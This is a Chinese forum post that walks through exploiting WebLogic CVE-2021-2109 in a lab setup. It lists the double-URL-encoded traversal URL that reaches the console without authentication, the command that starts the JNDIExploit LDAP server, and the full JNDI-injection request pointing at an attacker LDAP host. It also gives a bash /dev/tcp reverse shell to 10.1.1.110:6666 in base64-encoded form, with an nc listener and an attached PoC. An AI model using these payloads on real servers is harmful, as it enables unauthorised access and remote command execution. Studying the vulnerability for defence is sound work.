Weblogic未授权访问以及LDAP远程代码执行(CVE-2021-2109)
1.影响版本:
WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
- 实验环境:
攻击机:kalilinux 10.1.1.10
靶机: 10.1.1.109
3.weblogic未授权访问:
对目标地址的7001端口直接访问
构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%252e%252f是../的二次url编码。成功访问到控制台,如果第一次未成功需要进行刷新。
此处存在weblogic的未授权访问,该版本受到影响。
4.远程代码执行
a.
启动需要攻击使用的ldap脚本 java -jar JNDIExploit.jar -i ip
下载地址:github的链接已经失效,我放在附件的位置。
配合WebLogic未授权漏洞进行代码执行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.1.1;110:1389/Basic/WeblogicEcho;AdminServer%22)
注意:使用ldap的第三个分隔符使用的是;,不是.
构造一个传参为cmd,即为我们执行的命令。
b.
另外开启一个终端,运行漏洞的poc。设置响应的参数,看到成功执行,并且获取到了shell。
c.利用漏洞生成反弹shell。
将bash反弹命令bash -i >&/dev/tcp/10.1.1.110/6666 0>&1进行base64编码转换:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTEwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
然后使用nc对本地的端口进行一个监听。
成功获取到shell
说明:大压缩文件中的poc发生了乱码,已经单独重新上传
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| woke | 4.00 | 0 | 2022-04-08 14:02:14 | 一个受益终生的帖子~~ |
| Track-劲夫 | 60.00 | 0 | 2022-04-07 19:07:34 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
返回:技术文章投稿区
漏洞文章
wuyafeiba
发表于 2022-4-24
附件中的poc.py运行有点问题啊
评论列表
加载数据中...